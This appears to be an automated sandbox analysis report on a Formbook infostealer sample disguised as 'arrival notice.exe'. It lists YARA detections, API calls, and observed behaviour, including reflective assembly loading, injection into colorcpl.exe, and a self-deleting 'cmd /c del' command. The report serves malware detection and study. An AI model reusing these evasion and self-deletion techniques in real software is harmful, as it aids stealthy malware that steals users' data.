          Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: arrival notice.exe
          .NET source code contains very large stringsShow sources
          Source: arrival notice.exe, Form1.csLong String: Length: 38272
          Source: 1.2.arrival notice.exe.220000.0.unpack, Form1.csLong String: Length: 38272
          Source: 1.0.arrival notice.exe.220000.0.unpack, Form1.csLong String: Length: 38272
          Source: 3.0.arrival notice.exe.ac0000.0.unpack, Form1.csLong String: Length: 38272
          Source: 3.2.arrival notice.exe.ac0000.1.unpack, Form1.csLong String: Length: 38272
          Source: arrival notice.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 1_2_009DE6181_2_009DE618
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 1_2_009DE6121_2_009DE612
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041B8DB3_2_0041B8DB
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041C1363_2_0041C136
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041D2293_2_0041D229
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00408C6B3_2_00408C6B
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00408C703_2_00408C70
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00402D873_2_00402D87
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B720A010_2_04B720A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5B09010_2_04B5B090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C120A810_2_04C120A8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5841F10_2_04B5841F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C0100210_2_04C01002
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7258110_2_04B72581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5D5E010_2_04B5D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B40D2010_2_04B40D20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C11D5510_2_04C11D55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B6412010_2_04B64120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4F90010_2_04B4F900
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C12D0710_2_04C12D07
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C12EF710_2_04C12EF7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C122AE10_2_04C122AE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B66E3010_2_04B66E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7EBB010_2_04B7EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C0DBD210_2_04C0DBD2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C11FF110_2_04C11FF1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C12B2810_2_04C12B28
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097B8DB10_2_0097B8DB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097C13610_2_0097C136
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097D22910_2_0097D229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00968C7010_2_00968C70
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00968C6B10_2_00968C6B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00962D9010_2_00962D90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00962D8710_2_00962D87
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00962FB010_2_00962FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04B4B150 appears 35 times
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004185D0 NtCreateFile,3_2_004185D0
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00418680 NtReadFile,3_2_00418680
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00418700 NtClose,3_2_00418700
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004187B0 NtAllocateVirtualMemory,3_2_004187B0
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004185CA NtCreateFile,3_2_004185CA
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041867C NtReadFile,3_2_0041867C
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004186FB NtClose,3_2_004186FB
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004187AC NtAllocateVirtualMemory,3_2_004187AC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89860 NtQuerySystemInformation,LdrInitializeThunk,10_2_04B89860
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89840 NtDelayExecution,LdrInitializeThunk,10_2_04B89840
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B899A0 NtCreateSection,LdrInitializeThunk,10_2_04B899A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B895D0 NtClose,LdrInitializeThunk,10_2_04B895D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_04B89910
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89540 NtReadFile,LdrInitializeThunk,10_2_04B89540
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B896E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_04B896E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B896D0 NtCreateKey,LdrInitializeThunk,10_2_04B896D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04B89660
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89650 NtQueryValueKey,LdrInitializeThunk,10_2_04B89650
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89A50 NtCreateFile,LdrInitializeThunk,10_2_04B89A50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89780 NtMapViewOfSection,LdrInitializeThunk,10_2_04B89780
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89FE0 NtCreateMutant,LdrInitializeThunk,10_2_04B89FE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89710 NtQueryInformationToken,LdrInitializeThunk,10_2_04B89710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B898A0 NtWriteVirtualMemory,10_2_04B898A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B898F0 NtReadVirtualMemory,10_2_04B898F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89820 NtEnumerateKey,10_2_04B89820
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B8B040 NtSuspendThread,10_2_04B8B040
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B895F0 NtQueryInformationFile,10_2_04B895F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B899D0 NtCreateProcessEx,10_2_04B899D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B8AD30 NtSetContextThread,10_2_04B8AD30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89520 NtWaitForSingleObject,10_2_04B89520
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89560 NtWriteFile,10_2_04B89560
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89950 NtQueueApcThread,10_2_04B89950
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89A80 NtOpenDirectoryObject,10_2_04B89A80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89A20 NtResumeThread,10_2_04B89A20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89610 NtEnumerateValueKey,10_2_04B89610
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89A10 NtQuerySection,10_2_04B89A10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89A00 NtProtectVirtualMemory,10_2_04B89A00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89670 NtQueryInformationProcess,10_2_04B89670
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B8A3B0 NtGetContextThread,10_2_04B8A3B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B897A0 NtUnmapViewOfSection,10_2_04B897A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89730 NtQueryVirtualMemory,10_2_04B89730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B8A710 NtOpenProcessToken,10_2_04B8A710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89B00 NtSetValueKey,10_2_04B89B00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89770 NtSetInformationFile,10_2_04B89770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B8A770 NtOpenThread,10_2_04B8A770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89760 NtOpenProcess,10_2_04B89760
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_009785D0 NtCreateFile,10_2_009785D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00978680 NtReadFile,10_2_00978680
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_009787B0 NtAllocateVirtualMemory,10_2_009787B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00978700 NtClose,10_2_00978700
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_009785CA NtCreateFile,10_2_009785CA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_009786FB NtClose,10_2_009786FB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097867C NtReadFile,10_2_0097867C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_009787AC NtAllocateVirtualMemory,10_2_009787AC
          Source: arrival notice.exe, 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs arrival notice.exe
          Source: arrival notice.exe, 00000001.00000000.347284510.00000000002C2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIsolatedStora.exeh$ vs arrival notice.exe
          Source: arrival notice.exe, 00000001.00000002.381149131.0000000002647000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEnvoySinks.dll6 vs arrival notice.exe
          Source: arrival notice.exe, 00000003.00000002.450859153.0000000000B62000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIsolatedStora.exeh$ vs arrival notice.exe
          Source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs arrival notice.exe
          Source: arrival notice.exe, 00000003.00000002.452694295.0000000003463000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs arrival notice.exe
          Source: arrival notice.exeBinary or memory string: OriginalFilenameIsolatedStora.exeh$ vs arrival notice.exe
          Source: arrival notice.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: arrival notice.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: arrival notice.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: arrival notice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: arrival notice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\arrival notice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\arrival notice.exe 'C:\Users\user\Desktop\arrival notice.exe'
          Source: C:\Users\user\Desktop\arrival notice.exeProcess created: C:\Users\user\Desktop\arrival notice.exe C:\Users\user\Desktop\arrival notice.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\arrival notice.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\arrival notice.exeProcess created: C:\Users\user\Desktop\arrival notice.exe C:\Users\user\Desktop\arrival notice.exeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\arrival notice.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\arrival notice.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@7/3
          Source: C:\Users\user\Desktop\arrival notice.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6240:120:WilError_01
          Source: arrival notice.exe, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 1.2.arrival notice.exe.220000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 1.0.arrival notice.exe.220000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 3.0.arrival notice.exe.ac0000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 3.2.arrival notice.exe.ac0000.1.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: arrival notice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: arrival notice.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: colorcpl.pdbGCTL source: arrival notice.exe, 00000003.00000002.452677257.0000000003460000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: arrival notice.exe, 00000003.00000002.452677257.0000000003460000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmp, colorcpl.exe, 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmp, colorcpl.exe

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: arrival notice.exe, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.arrival notice.exe.220000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.arrival notice.exe.220000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.arrival notice.exe.ac0000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.2.arrival notice.exe.ac0000.1.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 1_2_0022297F push 20000001h; retf 1_2_00222992
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041B87C push eax; ret 3_2_0041B882
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041B812 push eax; ret 3_2_0041B818
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041B81B push eax; ret 3_2_0041B882
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00412A95 pushfd ; retf 3_2_00412A96
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00415BB5 push eax; retf 3_2_00415BBB
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004186CA push edx; retn 0076h3_2_004186CB
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0040169B push es; iretd 3_2_0040169D
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00414EA9 push es; ret 3_2_00414EAB
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041B7C5 push eax; ret 3_2_0041B818
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00AC297F push 20000001h; retf 3_2_00AC2992
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B9D0D1 push ecx; ret 10_2_04B9D0E4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097B812 push eax; ret 10_2_0097B818
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097B81B push eax; ret 10_2_0097B882
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097B87C push eax; ret 10_2_0097B882
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00972A95 pushfd ; retf 10_2_00972A96
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00975BB5 push eax; retf 10_2_00975BBB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0096169B push es; iretd 10_2_0096169D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00974EA9 push es; ret 10_2_00974EAB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_009786CA push edx; retn 0076h10_2_009786CB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097B7C5 push eax; ret 10_2_0097B818
          Source: initial sampleStatic PE information: section name: .text entropy: 7.50720151133

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: /c del 'C:\Users\user\Desktop\arrival notice.exe'
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: /c del 'C:\Users\user\Desktop\arrival notice.exe'Jump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
